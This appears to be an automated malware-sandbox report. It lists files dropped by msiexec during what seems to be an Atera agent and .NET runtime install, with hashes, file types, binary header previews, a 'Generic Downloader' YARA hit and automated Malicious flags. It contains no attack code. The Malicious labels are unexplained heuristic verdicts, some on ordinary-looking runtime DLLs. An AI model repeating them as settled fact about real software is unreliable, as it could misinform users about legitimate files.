                                                                                                                                                                                                                                        SSDEEP:192:g8yWvhWVWYnO/VWQ4mWWeUDj21EhqnajKsxRIM9:gtWvhWFUtDqslGsxRIG
                                                                                                                                                                                                                                        MD5:EBC168D7D3EA7C6192935359B6327627
                                                                                                                                                                                                                                        SHA1:AECEB7C071CF1BB000758B6CEEBEFEEC91AD22BD
                                                                                                                                                                                                                                        SHA-256:C048A3D7AB951DCE1D6D3F5F497B50353F640A1787C6C65677A13C55C8E99983
                                                                                                                                                                                                                                        SHA-512:891D252ECD50BDED4614547758D5E301BDF8E71FBB1023FF89F8DE2F81927CC7CC84B98985D99E8FA8DCBF361E5117D9C625DC0D36983AFC3F2AA48A54CE3D48
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29144
                                                                                                                                                                                                                                        Entropy (8bit):4.946641263598223
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:MQM4Oe59Ckb1hgmLJWvhWdUN8HOhlxAnY:rMq59Bb1jeanOunY
                                                                                                                                                                                                                                        MD5:7A235962DBAB1E807C6EC7609FC76077
                                                                                                                                                                                                                                        SHA1:148DDD11A0D366313F75871007057B3F0485AB33
                                                                                                                                                                                                                                        SHA-256:F7C5D7394643C95FE14C07773A8A206E74A28DB125F9B3976F9E1C8C599F2AF1
                                                                                                                                                                                                                                        SHA-512:25B21EE7BB333E5E34D2B4A32D631A50B8FFAF1F1320D47C97C2A4DFF59FA2A2703CDF30638B46C800D3150EFAA4A2518C55E7B2A3B2E4273F43DD5CA83AE940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29136
                                                                                                                                                                                                                                        Entropy (8bit):4.764408242494898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:VA/kPLPmIHJI6/CpG3t2G3t4odXLJWvhWSUwlmX7aJdlGszti:y/kjPmIHJI6AFc7aJGT
                                                                                                                                                                                                                                        MD5:B3B4A0F3FCE120318E71DE3AFB6BB1AA
                                                                                                                                                                                                                                        SHA1:D3349409EC717F942769BA67FECA40557C1423D0
                                                                                                                                                                                                                                        SHA-256:A38E6786DC8EC6D2717343DBE00BB2FDDA008D87935BBD9371AE94E7E004270B
                                                                                                                                                                                                                                        SHA-512:4A130674DDBB05949665F6F7A070B25E82C34047D1E62EC60C73F815CED39A9041D972BE4E8C505F9B13C5BCDC114F3479BF8D69D7D9CF9987D39A6F5DB7F560
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):74192
                                                                                                                                                                                                                                        Entropy (8bit):5.1227875842071615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:LLraHgDe5c4bFe2JyhcvxXWpD7d3334BkZnjPgB/P5W:baHgDe5c4bFe2JyhcvxXWpD7d3334Bkb
                                                                                                                                                                                                                                        MD5:7033AB91EA4F0593E4D6009D549E560F
                                                                                                                                                                                                                                        SHA1:4951CE111CA56994D007A9714A78CDADEEB0DACF
                                                                                                                                                                                                                                        SHA-256:BE7901AA1FACEA8E1FD74A62BDE54CC3BD8E898B52E76FABB70342B160989B80
                                                                                                                                                                                                                                        SHA-512:8BC3B880E31EBE3BC438A24D2AF249C95E320AC3C7A501027EF634F55AAB6FAC4F6D1090A00C29A44657A34EBADCD62023F2E947D31C192072698B645F8651ED
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.608840616484201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:4adyqjd7VWvhWpWYnO/VWQ4mWB8nXEKup3JdqnajKszt0CkD:4aQ0WvhWpUnX7aJdlGszt0r
                                                                                                                                                                                                                                        MD5:55463244172161B76546DC2DE37F42BD
                                                                                                                                                                                                                                        SHA1:C10A5360AD5E340D59C814E159EA1EFCBF5BF3EE
                                                                                                                                                                                                                                        SHA-256:4166A32551989F960DAC7C0E296FFB28092F45F6539E7C450FA04BF17612BE73
                                                                                                                                                                                                                                        SHA-512:EACEC78FF95F60DEF6F7F27BDA4A84F1DD2DFA386EFC4F6DA770C37268DF83C5B402693EA5C29F54D48026579F3843DB26ADD4D6448EA10CBF7F14D4D14A72FD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):4.795732177662406
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:oHUW9MPrpJhhf4AN5/KiZWvhWMWYnO/VWQ4mWLz8Y5H2vArqnajKsbTYCkI:oHUZr7PWvhW6UeH24rlGsbTYCx
                                                                                                                                                                                                                                        MD5:27C4A3BCC0F1DBA2DE4C2242CD489F3B
                                                                                                                                                                                                                                        SHA1:A704FD91E3C67108B1F02FD5E9F1223C7154A9CC
                                                                                                                                                                                                                                        SHA-256:315DED39D9E157CEC05D83711C09858C23602857C9D8C88BEEF121C24C43BE84
                                                                                                                                                                                                                                        SHA-512:793E74DFB1052C06AB4C29E7B622C795CC3122A722382B103940B94E9DAC1E6CA8039DF48C558EFCC5D952A0660393AE2B11CED5ADE4DC8D5DD31A9F5BB9F807
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):5.082770273323341
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:DA2uWYFxEpahrWvhW/nWYnO/VWQ4mWSmRkH2vArqnajKsbTYMlBzK:DIFVhrWvhWfUERkH24rlGsbTYx
                                                                                                                                                                                                                                        MD5:306608A878089CB38602AF693BA0485B
                                                                                                                                                                                                                                        SHA1:59753556F471C5BF1DFEF46806CB02CF87590C5C
                                                                                                                                                                                                                                        SHA-256:3B59A50457F6B6EAA6D35E42722D4562E88BCD716BAE113BE1271EAD0FEB7AF3
                                                                                                                                                                                                                                        SHA-512:21B626E619AAF4EDA861A9C5EDF02133C63ADC9E893F38FEDE72D90A6E8BE0E566C117A8A24CA4BAB77928083AE4A859034417B035E8553CC7CCFB88CB4CBD9C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):5.075489018611419
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:dozmT5yguNvZ5VQgx3SbwA71IkFPaPA6XHPe:dozmT5yguNvZ5VQgx3SbwA71IAaP7XH2
                                                                                                                                                                                                                                        MD5:EC1381C9FDA84228441459151E7BADEA
                                                                                                                                                                                                                                        SHA1:DB2D37F3C04A2C2D4B6F9B3FD82C1BE091E85D2C
                                                                                                                                                                                                                                        SHA-256:44DDAB31C182235AC5405D31C1CBA048316CC230698E392A732AC941EC683BAD
                                                                                                                                                                                                                                        SHA-512:EE9EBBDC23E7C945F2B291FDE5EB68A42C11988182E6C78C0AB8FA9CB003B24910974A3291BCDAA0C8D1F9DFA8DF40293848FB9A16C4BE1425253BED0511A712
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):5.000234308172749
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:SNDKWvhW/WYnO/VWQ4mWVx2RoXEKup3JdqnajKsztg/J:RWvhWvUexqoX7aJdlGsztgx
                                                                                                                                                                                                                                        MD5:4CF70855444F38E1EB71F9C3CD1C6E86
                                                                                                                                                                                                                                        SHA1:D06AEC4008D397756EE841F0E7A435D1C05B5F07
                                                                                                                                                                                                                                        SHA-256:A409E25A9D3C252CC0A5AF9DF85D3733E946087B06CD1FB2CF1BF640EB0D49BA
                                                                                                                                                                                                                                        SHA-512:A13A80645E679343AC5638E8AA6A03012F16200CB3A4637BE52A01AA3BEF854324A8ED1882CA91B304B9C47B6351B1FC1671F4DEDE5BE77BC208A71FE6029064
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.5308703760687745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:6PjfHQduHWvhWjWYnO/VWQ4mWEwXBXEKup3JdqnajKsztqOT+:QfxWvhWjUoXBX7aJdlGsztqx
                                                                                                                                                                                                                                        MD5:FCD6B29932D6FB307964B2D3F94E6B48
                                                                                                                                                                                                                                        SHA1:BE560F8A63C8E36A7B3FA48FF384F99F69A5D4F7
                                                                                                                                                                                                                                        SHA-256:CFB2EE4E426BB00B76163C1A66CF8CFEF8D7450CBF9BBCE3BC9EB2053F51E0E5
                                                                                                                                                                                                                                        SHA-512:3EDFCF559F1E21870277358E6D266A1A0CEA68B163B11C73108F3B6A56006D20B51410A3B4EA39BF80906BF6C9D573E1072697CFCD6A3D37E3679EA54757C69F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):304800
                                                                                                                                                                                                                                        Entropy (8bit):4.2336898246942685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:REX9Xit++0PJSKtOJsgI3mwNdmLZ8mTQfsqxEdB:S9xacWIfsqOD
                                                                                                                                                                                                                                        MD5:DBEB3E7BAE9873B4317F7E581AAF7DA5
                                                                                                                                                                                                                                        SHA1:9008A7E3F3CC8CA70DE2A6501514E1BC89B480B0
                                                                                                                                                                                                                                        SHA-256:1498113CBB7EECF7CC591502DC70C138165CFBABBCBB013E103C98357EC9C9EC
                                                                                                                                                                                                                                        SHA-512:4E5EE6CD29DD31F0881DF453726472166489E4AA6E2F2C98271FD79ED37C0B4022C37F684265EE790687D9925B04127639A1487FC1608F7B5FAB8ED643B69D24
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1436848
                                                                                                                                                                                                                                        Entropy (8bit):6.4837820325046405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:fLtbu58TIu2rlMBDr0PZYRhVj95f1L7Zr5/z/5ccUYXIBXzkTVsHgWolUZbGwqfy:fLtHAcX0PZuhVDh7ZN7/6YXIBjkBsHgy
                                                                                                                                                                                                                                        MD5:7B4375E2D9212108130ACA9438B204B4
                                                                                                                                                                                                                                        SHA1:8AD0A3C29A02429FA4233E0CBE09897EB3960A46
                                                                                                                                                                                                                                        SHA-256:C8C62D5043E1E16089B85BADC0D41DAA4B8EBCBE8608435783C07679BACD159E
                                                                                                                                                                                                                                        SHA-512:FD33720895EBEB0074727A38F467209CBE763600476687F42E9727486133B9293F8D18C016CA14991D1671EC87AB09F8722645C54B1E326282E480F801F8B264
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5125400
                                                                                                                                                                                                                                        Entropy (8bit):6.552600854604914
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:TRUteSi8SjfXq6ZlxPCEsBfdSf30d9A6oWUqSp0eTVRapiB8YNCdT2eBRJoqN2nc:9U6RxPCEwpJc5H8GatXj
                                                                                                                                                                                                                                        MD5:3F517CD4D560FF7C81CA4E0ACF375A96
                                                                                                                                                                                                                                        SHA1:53375106AD45031329A0FB075C0D3193C4A8FAC6
                                                                                                                                                                                                                                        SHA-256:64E1C7636E731BB9DD30ADF26526BA69A64786F0D4C6979265CB5575AD1ABFF2
                                                                                                                                                                                                                                        SHA-512:C7FBA2ECE43B3328F5A041407EA4D729BDBCCC65869E7540C7CA1AB558FACCE9E434812C362131CF9D04573D3EDD5460747DEBC175E45BFCEF281546C94476A6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58208
                                                                                                                                                                                                                                        Entropy (8bit):6.335250887121676
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:IIkf5nMEPz7omzpq/4Jw1AsDZq7v613eUu8sGzWjK9zv2:wn5tLX62Cu8TzW6zv2
                                                                                                                                                                                                                                        MD5:69338F5C8F7B6567B5E4D83173BD15CD
                                                                                                                                                                                                                                        SHA1:E2846481C76E4720CE86F57BF7864533A7EC753D
                                                                                                                                                                                                                                        SHA-256:31ABD14FFAFD56AB69CC0D7222A8004177F689BBBCBAD7312D8C2FC03F32E2E1
                                                                                                                                                                                                                                        SHA-512:58C721578AE472F4FA275A58483CACA669828254AADEA1457C723E7D353C8D5673736F36C79DA06234C300AB9F361546650A754F6D7EF1CDEF79B5CD2171C806
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):140464
                                                                                                                                                                                                                                        Entropy (8bit):6.413381282488342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:8XY8Ja8dy1+iLfBcGPUZZceOiU8mJ/QQc962jqc413OjgrxkwF+aW/CzWa:QLgDL+vU8mpcoOjgrxkLaQCn
                                                                                                                                                                                                                                        MD5:A826058DA5A74D575C5FBBA98D2DE708
                                                                                                                                                                                                                                        SHA1:B8B628B29BFC99A1CF6565DC0AD941F3A15B67D7
                                                                                                                                                                                                                                        SHA-256:EB642F50E67611DD041AADF3BFCAEC9FF69A3BBDE27D59BD6F38900307D25CE8
                                                                                                                                                                                                                                        SHA-512:07D97B9F87BC16B47487C7193084769C751CC2DFF5CD6D033E1575C978B9A3448045CE6B7DFC2A2C4BAB3C17E889679AFE19671AADFA9C2C8FAFFB78BBCC8171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):394528
                                                                                                                                                                                                                                        Entropy (8bit):6.311616444156745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:BBGjtN9JhCdJeD1QL3sQy8XyV0l0gzPI37VPzBz3BUt9OqOHBE/Xb:BBGjtNlU/rsQy8XyxzkZOGX
                                                                                                                                                                                                                                        MD5:99627BE8353E7B34EBDBBBF965470601
                                                                                                                                                                                                                                        SHA1:E60681E3F81B4DCAF304E715878ED9F3984A1BAA
                                                                                                                                                                                                                                        SHA-256:B54E1ACF51C3A876C68E99FF17C5A585AF264CFC25F57D6913EA9BD85FCB25B5
                                                                                                                                                                                                                                        SHA-512:BC162E11BDF84ECB7C0DA3F6FFDAB3380958C8B9C86E9DC4CBF03BC8FE3C5B2D958E11FB373D5944418F687F7F559C1DBECA36B37D1AE4472BB8B58420A7AD6C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1320360
                                                                                                                                                                                                                                        Entropy (8bit):6.373679704817961
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W3ccAqMv7jLs0eJqwnSA/RSwn20qv6InSITDHuPGct:W7s7jsjS4znnqyIn7TrvU
                                                                                                                                                                                                                                        MD5:4C295F5F2D61B58ABFFDBEAFC26ED0A0
                                                                                                                                                                                                                                        SHA1:4948926A75605082BF2F2266910A90E526890C75
                                                                                                                                                                                                                                        SHA-256:1CD7F8274A9856A9A5A26AE2414C2DCE6E194F5C7CC0E3B566564F8A8A758C6D
                                                                                                                                                                                                                                        SHA-512:245E4571E5F49281093CCEA9FF488BCE4A73AA4D0DB2423B1E9C9C25192CA02387B3D18C7519B756958139ED99CD27B1A81135CA6F8A8D8575CF682CA5B4FC1F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1268256
                                                                                                                                                                                                                                        Entropy (8bit):6.353875443999665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+ZdZVsOfVMIVAeZeSuIN5R2kMfmZmogeOaypw7ZSryE0BbdIUtVL0GUix+VgFow6:+ZdZVscj9cSuINr2JeOayeFbpo7iE8oJ
                                                                                                                                                                                                                                        MD5:8C06FB2F713A634561B3DC6E5469DE70
                                                                                                                                                                                                                                        SHA1:4FB727BAC8E600A04D200351600DDDB160487D15
                                                                                                                                                                                                                                        SHA-256:BEAD06E37ED9D1292F205C8F9D1825AF1BA21A1461E1EA1030A16872BC12C854
                                                                                                                                                                                                                                        SHA-512:A624E37FF0A29767C2E04BDC5120D88D48D0DF687F6B48291C5CC7F9CF89FFEF771EC0946EB00030DDC5623DD29B3AB510F9B0EB35C70A2F1DAE6C1C1784B82A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58528
                                                                                                                                                                                                                                        Entropy (8bit):5.6446323123377224
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:l8zO+8uP8x/A15A4HI4gJl01Qa7ICltVvTFClpDuO9zh:yzO+8uA/A15A4o4gJq1DI+vBipzh
                                                                                                                                                                                                                                        MD5:86E65EF2C83159E84F5A7C36EC78867E
                                                                                                                                                                                                                                        SHA1:A0FC2165DAF648BCBAAB3DF2AE0FBAE3FEC0A702
                                                                                                                                                                                                                                        SHA-256:5319693193C2BCBBE56E1090E1EEA513A0145557E40A789BF96F562C0D0CC8E1
                                                                                                                                                                                                                                        SHA-512:A6537F4D68ED63DE7D627B8B321010C83D175E0EA50F33AC5DCC5692EF5BA9620A2BD3572B8F4771ACC1B02ECD5B852482CE1EF75B47C65597D2914F4F1D0A37
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):147104
                                                                                                                                                                                                                                        Entropy (8bit):3.8671404588318095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9V8Zms10iHvh7x8SKJlZ4vCCk7nw55IvZ4MgSZctpoEXXniizP:9V8Z/aSKlZ4ZGnwmUS4Scnp7
                                                                                                                                                                                                                                        MD5:81556C4545EC2CC21AD218639A0C003B
                                                                                                                                                                                                                                        SHA1:E80EE14AB3EEE7BAA7FF86B07DDD64B38788D4B9
                                                                                                                                                                                                                                        SHA-256:214186149DDF144E9FB1935A7B39FA9393D188CCA6558AE580F3DCB3465ABA5C
                                                                                                                                                                                                                                        SHA-512:99243E57988B7758B8537A43815840509B37CCEB3BEB4B8E6A8086ACB36880D5AA63A4496E16C3BAD34D2D8EDAFF7A240E6FFEC9F60488B6A31D9A957B4CA7C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):517032
                                                                                                                                                                                                                                        Entropy (8bit):6.327188439808119
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:DD4t2kjj3Ueh/9WoJcDSdiA9HuUrUb9KcvYCxe3Rw42SISaVGxQJyRMq1KsLGjrT:DDrkjjUoJcDSdiw4QcO3RoS9MV
                                                                                                                                                                                                                                        MD5:B5D0F85E7C820DB76EF2F4535552F03C
                                                                                                                                                                                                                                        SHA1:91EFF42F542175A41549BC966E9B249B65743951
                                                                                                                                                                                                                                        SHA-256:3D6D6E7A6F4729A7A416165BEABDA8A281AFFF082EBB538DF29E8F03E1A4741C
                                                                                                                                                                                                                                        SHA-512:5246EBEAF84A0486FF5ADB2083F60465FC68393D50AF05D17F704D08229CE948860018CBE880C40D5700154C3E61FC735C451044F85E03D78568D60DE80752F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101664
                                                                                                                                                                                                                                        Entropy (8bit):5.505707682437033
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:oiTrnaN0HjO8MZYq5V4bgDHsPdPpwSJ5L3Akcg9Qc7WUEp4za:JaN8qZYe4bgDUnNKc7nXm
                                                                                                                                                                                                                                        MD5:6F476F66A2C6228DA38FE6C7ED7CA439
                                                                                                                                                                                                                                        SHA1:2C13ABA2E1A19F00C98A1AB82066512B6B555375
                                                                                                                                                                                                                                        SHA-256:78798868341E36FC9B782AB9313CC7035C5173509552F4BB95B44A5D0D044B23
                                                                                                                                                                                                                                        SHA-512:C3E5132101845D821D040ABE97EE2EA07D04135ADFD11E880D08000C8B03ECC7853AF7CEE5BF18C07361F29C5867D9A7120F6F1D4053F624E25F6021C8E03367
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%$..........." ..0..Z..........6x... ........... ....................................`..................................w..O.......8............d.. )...........w..T............................................ ............... ..H............text...<X... ...Z.................. ..`.rsrc...8............\..............@..@.reloc...............b..............@..B.................x......H.......P ..DV...................v......................................BSJB............v4.0.30319......l.......#~..,.......#Strings.....R......#US..R......#GUID....R..P...#Blob............T.........3................................U...(......H.........5*....;*....'8.........., A...7.J..P4*U..5#*U...:*U..n7*U..&1*U....*U.../*U..(7*U...(*U...T-..../-...i&....7*................./...../...../...)./...1./...9./...A./...I./...Q./...Y./...a./...i./...q./...y./...../. .../...../...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1122768
                                                                                                                                                                                                                                        Entropy (8bit):6.6466118295886165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
                                                                                                                                                                                                                                        MD5:3B337C2D41069B0A1E43E30F891C3813
                                                                                                                                                                                                                                        SHA1:EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
                                                                                                                                                                                                                                        SHA-256:C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
                                                                                                                                                                                                                                        SHA-512:FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:K..:K..:K..K..:K..;K..:KK..K..:KK.:J..:KK.9J..:KK.?J..:KK.>J.:KK.4J..:KK..K..:KK.8J..:KRich..:K........PE..d................" .....0..........0^...............................................N....`A................................................................. ...........!...... .......p............................Z..8..............(............................text...X .......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata....... ......................@..@.rsrc...............................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2402
                                                                                                                                                                                                                                        Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                        MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                        SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                        SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                        SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
